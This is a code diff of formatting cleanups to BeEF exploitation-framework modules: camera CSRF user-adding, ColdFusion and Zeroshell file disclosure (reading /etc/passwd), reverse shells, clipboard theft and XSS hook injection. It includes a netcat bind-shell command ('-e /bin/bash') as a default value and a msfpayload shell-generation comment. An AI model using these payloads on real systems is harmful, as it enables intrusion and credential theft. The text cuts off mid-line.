b/modules/exploits/camera/airlive_ip_camera_csrf/module.rb @@ -4,17 +4,15 @@ # See the file 'doc/COPYING' for copying permission # class Airlive_add_user_csrf < BeEF::Core::Command - - def self.options - return [ - {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.1/'}, - {'name' => 'user', 'ui_label' => 'Desired username', 'value' => 'beef'}, - {'name' => 'pass', 'ui_label' => 'Desired password', 'value' => '__BeEF__'} - ] - end - - def post_execute - save({'result' => @datastore['result']}) - end + def self.options + [ + { 'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.1/' }, + { 'name' => 'user', 'ui_label' => 'Desired username', 'value' => 'beef' }, + { 'name' => 'pass', 'ui_label' => 'Desired password', 'value' => '__BeEF__' } + ] + end + def post_execute + save({ 'result' => @datastore['result'] }) + end end diff --git a/modules/exploits/camera/dlink_dcs_series_csrf/module.rb b/modules/exploits/camera/dlink_dcs_series_csrf/module.rb index f194cf9e9..d99c5d319 100644 --- a/modules/exploits/camera/dlink_dcs_series_csrf/module.rb +++ b/modules/exploits/camera/dlink_dcs_series_csrf/module.rb @@ -4,16 +4,14 @@ # See the file 'doc/COPYING' for copying permission # class Dlink_dcs_series_csrf < BeEF::Core::Command - def self.options - return [ - {'name' => 'base', 'ui_label' => 'Camera web root', 'value' => 'http://192.168.0.1/'}, - {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'} + [ + { 'name' => 'base', 'ui_label' => 'Camera web root', 'value' => 'http://192.168.0.1/' }, + { 'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__' } ] end - + def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end - end diff --git a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb index 980cd6f0d..1642dbbce 100644 --- a/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb +++ b/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb @@ -4,16 +4,14 @@ # See the file 'doc/COPYING' for copying permission # class Linksys_wvc_wireless_camera_csrf < BeEF::Core::Command - - def self.options - return [ - {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.101/'}, - {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'} - ] - end - - def post_execute - save({'result' => @datastore['result']}) - end + def self.options + [ + { 'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.101/' }, + { 'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__' } + ] + end + def post_execute + save({ 'result' => @datastore['result'] }) + end end diff --git a/modules/exploits/coldfusion_dir_traversal_exploit/module.rb b/modules/exploits/coldfusion_dir_traversal_exploit/module.rb index f98b63820..71374071d 100644 --- a/modules/exploits/coldfusion_dir_traversal_exploit/module.rb +++ b/modules/exploits/coldfusion_dir_traversal_exploit/module.rb @@ -4,23 +4,19 @@ # See the file 'doc/COPYING' for copying permission # class Coldfusion_dir_traversal_exploit < BeEF::Core::Command - def self.options - return [ - {'name' => 'fileToRetrieve', 'ui_label' => 'Retrieve file (in CF /lib dir)', 'value' => 'password.properties'}, - { 'name' => 'os_combobox', 'type' => 'combobox', 'ui_label' => 'CF server OS', 'store_type' => 'arraystore', - 'store_fields' => ['os'], 'store_data' => [['Windows'],['Linux/MacOSX/*BSD']], - 'valueField' => 'os', 'displayField' => 'os', 'mode' => 'local', 'autoWidth' => true - }, - { 'name' => 'cf_version', 'type' => 'combobox', 'ui_label' => 'ColdFusion version', 'store_type' => 'arraystore', - 'store_fields' => ['cf_version'], 'store_data' => [['8'],['9']], - 'valueField' => 'cf_version', 'displayField' => 'cf_version', 'mode' => 'local', 'autoWidth' => true - } + [ + { 'name' => 'fileToRetrieve', 'ui_label' => 'Retrieve file (in CF /lib dir)', 'value' => 'password.properties' }, + { 'name' => 'os_combobox', 'type' => 'combobox', 'ui_label' => 'CF server OS', 'store_type' => 'arraystore', + 'store_fields' => ['os'], 'store_data' => [['Windows'], ['Linux/MacOSX/*BSD']], + 'valueField' => 'os', 'displayField' => 'os', 'mode' => 'local', 'autoWidth' => true }, + { 'name' => 'cf_version', 'type' => 'combobox', 'ui_label' => 'ColdFusion version', 'store_type' => 'arraystore', + 'store_fields' => ['cf_version'], 'store_data' => [['8'], ['9']], + 'valueField' => 'cf_version', 'displayField' => 'cf_version', 'mode' => 'local', 'autoWidth' => true } ] end def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end - end diff --git a/modules/exploits/extract_cmd_exec/module.rb b/modules/exploits/extract_cmd_exec/module.rb index b06251411..afecc8d1c 100644 --- a/modules/exploits/extract_cmd_exec/module.rb +++ b/modules/exploits/extract_cmd_exec/module.rb @@ -12,19 +12,18 @@ # Source: http://sourceforge.net/projects/extract/ ### class Extract_cmd_exec < BeEF::Core::Command - def self.options - return [ - {'name'=>'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1'}, - {'name'=>'rport', 'ui_label' => 'Remote Port', 'value' => '10100'}, - {'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'}, - {'name'=>'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type'=>'textarea', 'value'=>'{netcat,-l,-p,1337,-e,/bin/bash}', 'width'=>'200px' }, + [ + { 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1' }, + { 'name' => 'rport', 'ui_label' => 'Remote Port', 'value' => '10100' }, + { 'name' => 'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15' }, + { 'name' => 'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type' => 'textarea', + 'value' => '{netcat,-l,-p,1337,-e,/bin/bash}', 'width' => '200px' } ] end def post_execute - save({'result' => @datastore['result']}) if not @datastore['result'].nil? - save({'fail' => @datastore['fail']}) if not @datastore['fail'].nil? + save({ 'result' => @datastore['result'] }) unless @datastore['result'].nil? + save({ 'fail' => @datastore['fail'] }) unless @datastore['fail'].nil? end - end diff --git a/modules/exploits/farsite_x25_remote_shell/module.rb b/modules/exploits/farsite_x25_remote_shell/module.rb index 6eecac781..23a99b632 100644 --- a/modules/exploits/farsite_x25_remote_shell/module.rb +++ b/modules/exploits/farsite_x25_remote_shell/module.rb @@ -1,23 +1,18 @@ -# class Farsite_x25_remote_shell < BeEF::Core::Command - def self.options @configuration = BeEF::Core::Configuration.instance beef_host = @configuration.beef_host - return [ + [ { 'name' => 'scheme', 'type' => 'combobox', 'ui_label' => 'HTTP(s)', 'store_type' => 'arraystore', - 'store_fields' => ['http'], 'store_data' => [['HTTP'],['HTTPS']], - 'valueField' => 'http', 'displayField' => 'http', 'mode' => 'local', 'autoWidth' => true - }, + 'store_fields' => ['http'], 'store_data' => [['HTTP'], ['HTTPS']], + 'valueField' => 'http', 'displayField' => 'http', 'mode' => 'local', 'autoWidth' => true }, { 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '10.0.0.1' }, - { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => "#{beef_host}" }, - { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444' } + { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => beef_host.to_s }, + { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444' } ] end def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end - end - diff --git a/modules/exploits/firephp/module.rb b/modules/exploits/firephp/module.rb index 1890a0ae7..ba36dec25 100644 --- a/modules/exploits/firephp/module.rb +++ b/modules/exploits/firephp/module.rb @@ -6,14 +6,13 @@ # PoC by Wireghoul: http://www.justanotherhacker.com/advisories/jahx132.html ### class Firephp_code_exec < BeEF::Core::Command - def pre_send rand_str = rand(32**10).to_s(32) # load payload.js file # generate payload: # msfpayload firefox/shell_bind_tcp LPORT=4444 R > payload.js - payload = "" + payload = '' f = File.open("#{$root_dir}/modules/exploits/firephp/payload.js") f.each_line do |line| payload << line @@ -22,16 +21,16 @@ class Firephp_code_exec < BeEF::Core::Command # construct exploit+payload HTTP response exploit = { - "RequestHeaders" => { - "1"=>"#{rand(10)}", - "2"=>"#{rand(10)}", - "3"=>"#{rand(10)}", - "4"=>"#{rand(10)}", - "5"=>"#{rand(10)}", - "6"=>"#{rand(10)}", - "7"=>"#{rand(10)}", - "8"=>"#{rand(10)}", - "9"=>"#{rand(10)}", + 'RequestHeaders' => { + '1' => rand(10).to_s, + '2' => rand(10).to_s, + '3' => rand(10).to_s, + '4' => rand(10).to_s, + '5' => rand(10).to_s, + '6' => rand(10).to_s, + '7' => rand(10).to_s, + '8' => rand(10).to_s, + '9' => rand(10).to_s, "'} - ] - - end - - def post_execute - save({'result' => @datastore['result']}) - end + [ + { 'name' => 'uri', 'ui_label' => 'Target URL', 'value' => "http://target/ossim/top.php?option=3&soption=3&url=" } + ] + end + def post_execute + save({ 'result' => @datastore['result'] }) + end end diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb b/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb index 1398fb3b3..b04df385c 100644 --- a/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb +++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb @@ -4,22 +4,18 @@ # See the file 'doc/COPYING' for copying permission # class Cisco_collaboration_server_5_xss < BeEF::Core::Command + def self.options + configuration = BeEF::Core::Configuration.instance + proto = configuration.get('beef.http.https.enable') == true ? 'https' : 'http' + hook_file = configuration.get('beef.http.hook_file') + hook_uri = "#{proto}://#{configuration.get('beef.http.host')}:#{configuration.get('beef.http.port')}#{hook_file}" - def self.options - - configuration = BeEF::Core::Configuration.instance - proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" - hook_file = configuration.get("beef.http.hook_file") - hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}#{hook_file}" - - return [ - {'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/webline/html/admin/wcs/LoginPage.jhtml?oper=&dest=">'} - ] - - end - - def post_execute - save({'result' => @datastore['result']}) - end + [ + { 'name' => 'uri', 'ui_label' => 'Target URL', 'value' => "http://target/webline/html/admin/wcs/LoginPage.jhtml?oper=&dest=\">" } + ] + end + def post_execute + save({ 'result' => @datastore['result'] }) + end end diff --git a/modules/exploits/xss/serendipity_1.6_xss/module.rb b/modules/exploits/xss/serendipity_1.6_xss/module.rb index a8d25e336..e8f67b554 100644 --- a/modules/exploits/xss/serendipity_1.6_xss/module.rb +++ b/modules/exploits/xss/serendipity_1.6_xss/module.rb @@ -4,22 +4,19 @@ # See the file 'doc/COPYING' for copying permission # class Serendipity_1_6_xss < BeEF::Core::Command + def self.options + configuration = BeEF::Core::Configuration.instance + proto = configuration.get('beef.http.https.enable') == true ? 'https' : 'http' + hook_file = configuration.get('beef.http.hook_file') + hook_uri = "#{proto}://#{configuration.get('beef.http.host')}:#{configuration.get('beef.http.port')}#{hook_file}" - def self.options - - configuration = BeEF::Core::Configuration.instance - proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" - hook_file = configuration.get("beef.http.hook_file") - hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}#{hook_file}" - - return [ - {'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/serendipity/serendipity_admin_image_selector.php?serendipity[textarea]=\'"'} - ] - - end - - def post_execute - save({'result' => @datastore['result']}) - end + [ + { 'name' => 'uri', 'ui_label' => 'Target URL', + 'value' => "http://target/serendipity/serendipity_admin_image_selector.php?serendipity[textarea]='\"" } + ] + end + def post_execute + save({ 'result' => @datastore['result'] }) + end end diff --git a/modules/exploits/xss/sqlitemanager_xss/module.rb b/modules/exploits/xss/sqlitemanager_xss/module.rb index 5c46054bf..de9076522 100644 --- a/modules/exploits/xss/sqlitemanager_xss/module.rb +++ b/modules/exploits/xss/sqlitemanager_xss/module.rb @@ -4,22 +4,18 @@ # See the file 'doc/COPYING' for copying permission # class Sqlitemanager_xss < BeEF::Core::Command + def self.options + configuration = BeEF::Core::Configuration.instance + proto = configuration.get('beef.http.https.enable') == true ? 'https' : 'http' + hook_file = configuration.get('beef.http.hook_file') + hook_uri = "#{proto}://#{configuration.get('beef.http.host')}:#{configuration.get('beef.http.port')}#{hook_file}" - def self.options - - configuration = BeEF::Core::Configuration.instance - proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" - hook_file = configuration.get("beef.http.hook_file") - hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}#{hook_file}" - - return [ - {'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://127.0.0.1/sqlite/index.php?dbsel=1"> @datastore['result']}) - end + [ + { 'name' => 'uri', 'ui_label' => 'Target URL', 'value' => "http://127.0.0.1/sqlite/index.php?dbsel=1\"> @datastore['result'] }) + end end diff --git a/modules/exploits/zenoss_3x_command_execution/module.rb b/modules/exploits/zenoss_3x_command_execution/module.rb index 83fd23cc2..d0a3e1aba 100644 --- a/modules/exploits/zenoss_3x_command_execution/module.rb +++ b/modules/exploits/zenoss_3x_command_execution/module.rb @@ -7,23 +7,21 @@ # For more information see: http://itsecuritysolutions.org/2012-07-30-zenoss-3.2.1-multiple-security-vulnerabilities/ ################################################################################ class Zenoss_command_execution < BeEF::Core::Command + def self.options + @configuration = BeEF::Core::Configuration.instance + lhost = @configuration.beef_host + lhost = '' if lhost == '0.0.0.0' + [ + { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' }, + { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '8080' }, + { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost }, + { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444' }, + { 'name' => 'user', 'ui_label' => 'Username', 'value' => 'admin' }, + { 'name' => 'pass', 'ui_label' => 'Password', 'value' => 'zenoss' } + ] + end - def self.options - @configuration = BeEF::Core::Configuration.instance - lhost = @configuration.beef_host - lhost = "" if lhost == "0.0.0.0" - return [ - { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1'}, - { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '8080' }, - { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost}, - { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444'}, - { 'name' => 'user', 'ui_label' => 'Username', 'value' => 'admin'}, - { 'name' => 'pass', 'ui_label' => 'Password', 'value' => 'zenoss'}, - ] - end - - def post_execute - save({'result' => @datastore['result']}) - end - + def post_execute + save({ 'result' => @datastore['result'] }) + end end diff --git a/modules/exploits/zenoss_add_user_csrf/module.rb b/modules/exploits/zenoss_add_user_csrf/module.rb index 0a1a60e18..9eef76014 100644 --- a/modules/exploits/zenoss_add_user_csrf/module.rb +++ b/modules/exploits/zenoss_add_user_csrf/module.rb @@ -4,33 +4,30 @@ # See the file 'doc/COPYING' for copying permission # class Zenoss_add_user_csrf < BeEF::Core::Command - - def self.options - return [ - { 'name' => 'base', 'ui_label' => 'Zenoss web root', 'value' => 'http://192.168.1.1:8080/'}, - { 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'}, - { 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'}, - { 'name' => 'user_level', - 'type' => 'combobox', - 'ui_label' => 'User Level', - 'store_type' => 'arraystore', - 'store_fields' => ['user_level'], - 'store_data' => [ - ['Manager'], - ['ZenManager'], - ['ZenUser'] - ], - 'emptyText' => 'Select a user level ("Manager" is highest)', - 'valueField' => 'user_level', - 'displayField' => 'user_level', - 'mode' => 'local', - 'autoWidth' => true - }, - ] - end - - def post_execute - save({'result' => @datastore['result']}) - end + def self.options + [ + { 'name' => 'base', 'ui_label' => 'Zenoss web root', 'value' => 'http://192.168.1.1:8080/' }, + { 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username' }, + { 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password' }, + { 'name' => 'user_level', + 'type' => 'combobox', + 'ui_label' => 'User Level', + 'store_type' => 'arraystore', + 'store_fields' => ['user_level'], + 'store_data' => [ + ['Manager'], + ['ZenManager'], + ['ZenUser'] + ], + 'emptyText' => 'Select a user level ("Manager" is highest)', + 'valueField' => 'user_level', + 'displayField' => 'user_level', + 'mode' => 'local', + 'autoWidth' => true } + ] + end + def post_execute + save({ 'result' => @datastore['result'] }) + end end diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_dynamic_token/module.rb b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_dynamic_token/module.rb index e346219e7..1c6ce37ab 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_dynamic_token/module.rb +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_dynamic_token/module.rb @@ -4,16 +4,14 @@ # See the file 'doc/COPYING' for copying permission # class Zeroshell_2_0rc2_admin_dynamic_token < BeEF::Core::Command + def self.options + [ + { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1' }, + { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' } + ] + end - def self.options - return [ - { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'}, - { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' } - ] - end - - def post_execute - save({'result' => @datastore['result']}) - end - + def post_execute + save({ 'result' => @datastore['result'] }) + end end diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/module.rb b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/module.rb index 907363969..9a6a77b0f 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/module.rb +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/module.rb @@ -4,16 +4,14 @@ # See the file 'doc/COPYING' for copying permission # class Zeroshell_2_0rc2_admin_password < BeEF::Core::Command + def self.options + [ + { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1' }, + { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' } + ] + end - def self.options - return [ - { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'}, - { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' } - ] - end - - def post_execute - save({'result' => @datastore['result']}) - end - + def post_execute + save({ 'result' => @datastore['result'] }) + end end diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_static_token/module.rb b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_static_token/module.rb index 579002b58..44f0e1f0b 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_static_token/module.rb +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_static_token/module.rb @@ -4,16 +4,14 @@ # See the file 'doc/COPYING' for copying permission # class Zeroshell_2_0rc2_admin_static_token < BeEF::Core::Command + def self.options + [ + { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1' }, + { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' } + ] + end - def self.options - return [ - { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'}, - { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' } - ] - end - - def post_execute - save({'result' => @datastore['result']}) - end - + def post_execute + save({ 'result' => @datastore['result'] }) + end end diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_file_disclosure/module.rb b/modules/exploits/zeroshell/zeroshell_2_0rc2_file_disclosure/module.rb index d065959dc..7346cf558 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_file_disclosure/module.rb +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_file_disclosure/module.rb @@ -4,17 +4,15 @@ # See the file 'doc/COPYING' for copying permission # class Zeroshell_2_0rc2_file_disclosure < BeEF::Core::Command + def self.options + [ + { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1' }, + { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' }, + { 'name' => 'rfile', 'ui_label' => 'Absolute file path', 'value' => '/etc/passwd' } + ] + end - def self.options - return [ - { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'}, - { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' }, - { 'name' => 'rfile', 'ui_label' => 'Absolute file path', 'value' => '/etc/passwd' } - ] - end - - def post_execute - save({'result' => @datastore['result']}) - end - + def post_execute + save({ 'result' => @datastore['result'] }) + end end diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/module.rb b/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/module.rb index c2abfabc1..05b4566a9 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/module.rb +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/module.rb @@ -4,17 +4,14 @@ # See the file 'doc/COPYING' for copying permission # class Zeroshell_2_0rc2_migrate_hook < BeEF::Core::Command + def self.options + [ + { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1' }, + { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' } + ] + end - def self.options - configuration = BeEF::Core::Configuration.instance - return [ - { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'}, - { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' } - ] - end - - def post_execute - save({'result' => @datastore['result']}) - end - + def post_execute + save({ 'result' => @datastore['result'] }) + end end diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/module.rb b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/module.rb index 82c4959ba..b51fe3a9b 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/module.rb +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/module.rb @@ -4,20 +4,19 @@ # See the file 'doc/COPYING' for copying permission # class Zeroshell_2_0rc2_reverse_shell_csrf_sop < BeEF::Core::Command - def self.options - @configuration = BeEF::Core::Configuration.instance - lhost = @configuration.beef_host - lhost = "" if lhost == "0.0.0.0" - return [ - { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'}, - { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' }, - { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost}, - { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444'} - ] - end - - def post_execute - save({'result' => @datastore['result']}) - end + def self.options + @configuration = BeEF::Core::Configuration.instance + lhost = @configuration.beef_host + lhost = '' if lhost == '0.0.0.0' + [ + { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1' }, + { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' }, + { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost }, + { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444' } + ] + end + def post_execute + save({ 'result' => @datastore['result'] }) + end end diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/module.rb b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/module.rb index f3b9ce101..70ba9c2d8 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/module.rb +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/module.rb @@ -4,25 +4,24 @@ # See the file 'doc/COPYING' for copying permission # class Zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass < BeEF::Core::Command - def pre_send - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/x.js', '/x', 'js') - end - - def self.options - @configuration = BeEF::Core::Configuration.instance - lhost = @configuration.beef_host - lhost = "" if lhost == "0.0.0.0" - return [ - { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'}, - { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' }, - { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost}, - { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444'} - ] - end + def pre_send + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/x.js', '/x', 'js') + end - def post_execute - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('x.js') - save({'result' => @datastore['result']}) - end + def self.options + @configuration = BeEF::Core::Configuration.instance + lhost = @configuration.beef_host + lhost = '' if lhost == '0.0.0.0' + [ + { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1' }, + { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' }, + { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost }, + { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444' } + ] + end + def post_execute + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('x.js') + save({ 'result' => @datastore['result'] }) + end end diff --git a/modules/exploits/zeroshell/zeroshell_2_0rc2_scanner/module.rb b/modules/exploits/zeroshell/zeroshell_2_0rc2_scanner/module.rb index 94cd84a89..0870fb0a9 100644 --- a/modules/exploits/zeroshell/zeroshell_2_0rc2_scanner/module.rb +++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_scanner/module.rb @@ -4,18 +4,16 @@ # See the file 'doc/COPYING' for copying permission # class Zeroshell_2_0rc2_scanner < BeEF::Core::Command + def self.options + [ + { 'name' => 'ip_start', 'ui_label' => 'From IP', 'value' => '192.168.0.1' }, + { 'name' => 'ip_end', 'ui_label' => 'To IP', 'value' => '192.168.0.254' }, + { 'name' => 'timeout', 'ui_label' => 'Get result in (ms)', 'value' => '30000' }, + { 'name' => 'ip_bloc', 'ui_label' => 'Scan per bloc (ip)', 'value' => '100' } + ] + end - def self.options - return [ - { 'name' => 'ip_start', 'ui_label' => 'From IP', 'value' => '192.168.0.1'}, - { 'name' => 'ip_end', 'ui_label' => 'To IP', 'value' => '192.168.0.254' }, - { 'name' => 'timeout', 'ui_label' => 'Get result in (ms)', 'value' => '30000'}, - { 'name' => 'ip_bloc', 'ui_label' => 'Scan per bloc (ip)', 'value' => '100'} - ] - end - - def post_execute - save({'result' => @datastore['result']}) - end - + def post_execute + save({ 'result' => @datastore['result'] }) + end end diff --git a/modules/host/clipboard_theft/module.rb b/modules/host/clipboard_theft/module.rb index ade010a85..482e8a53a 100644 --- a/modules/host/clipboard_theft/module.rb +++ b/modules/host/clipboard_theft/module.rb @@ -4,11 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Clipboard_theft < BeEF::Core::Command - def post_execute content = {} content['clipboard'] = @datastore['clipboard'] save content end - end diff --git a/modules/host/detect_airdroid/module.rb b/modules/host/detect_airdroid/module.rb index fa5ebca84..3b67a5292 100644 --- a/modules/host/detect_airdroid/module.rb +++ b/modules/host/detect_airdroid/module.rb @@ -5,31 +5,29 @@ # class Detect_airdroid < BeEF::Core::Command - def self.options - return [ - {'name' => 'ipHost', 'ui_label' => 'IP or Hostname', 'value' => '127.0.0.1'}, - {'name' => 'port' , 'ui_label' => 'Port', 'value' => '8888'} - ] + [ + { 'name' => 'ipHost', 'ui_label' => 'IP or Hostname', 'value' => '127.0.0.1' }, + { 'name' => 'port', 'ui_label' => 'Port', 'value' => '8888' } + ] end - + def post_execute - save({'airdroid' => @datastore['airdroid']}) + save({ 'airdroid' => @datastore['airdroid'] }) configuration = BeEF::Core::Configuration.instance - if configuration.get("beef.extension.network.enable") == true - if @datastore['results'] =~ /^proto=(https?)&ip=([\d\.]+)&port=([\d]+)&airdroid=Installed$/ - proto = $1 - ip = $2 - port = $3 - session_id = @datastore['beefhook'] - type = 'Airdroid' - if BeEF::Filters.is_valid_ip?(ip) - print_debug("Hooked browser found 'Airdroid' [proto: #{proto}, ip: #{ip}, port: #{port}]") - BeEF::Core::Models::NetworkService.create(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => type) - end - end + return unless configuration.get('beef.extension.network.enable') == true + return unless @datastore['results'] =~ /^proto=(https?)&ip=([\d.]+)&port=(\d+)&airdroid=Installed$/ + + proto = Regexp.last_match(1) + ip = Regexp.last_match(2) + port = Regexp.last_match(3) + session_id = @datastore['beefhook'] + type = 'Airdroid' + + if BeEF::Filters.is_valid_ip?(ip) + print_debug("Hooked browser found 'Airdroid' [proto: #{proto}, ip: #{ip}, port: #{port}]") + BeEF::Core::Models::NetworkService.create(hooked_browser_id: session_id, proto: proto, ip: ip, port: port, type: type) end end - end diff --git a/modules/host/detect_antivirus/module.rb b/modules/host/detect_antivirus/module.rb index c39a4bed4..8d70b5b35 100644 --- a/modules/host/detect_antivirus/module.rb +++ b/modules/host/detect_antivirus/module.rb @@ -5,9 +5,7 @@ # class Detect_antivirus < BeEF::Core::Command - def post_execute - save({'Antivirus' => @datastore['antivirus']}) + save({ 'Antivirus' => @datastore['antivirus'] }) end - end diff --git a/modules/host/detect_coupon_printer/module.rb b/modules/host/detect_coupon_printer/module.rb index 902927d81..c740c2372 100644 --- a/modules/host/detect_coupon_printer/module.rb +++ b/modules/host/detect_coupon_printer/module.rb @@ -6,6 +6,6 @@ class Detect_coupon_printer < BeEF::Core::Command def post_execute - save({'result' => 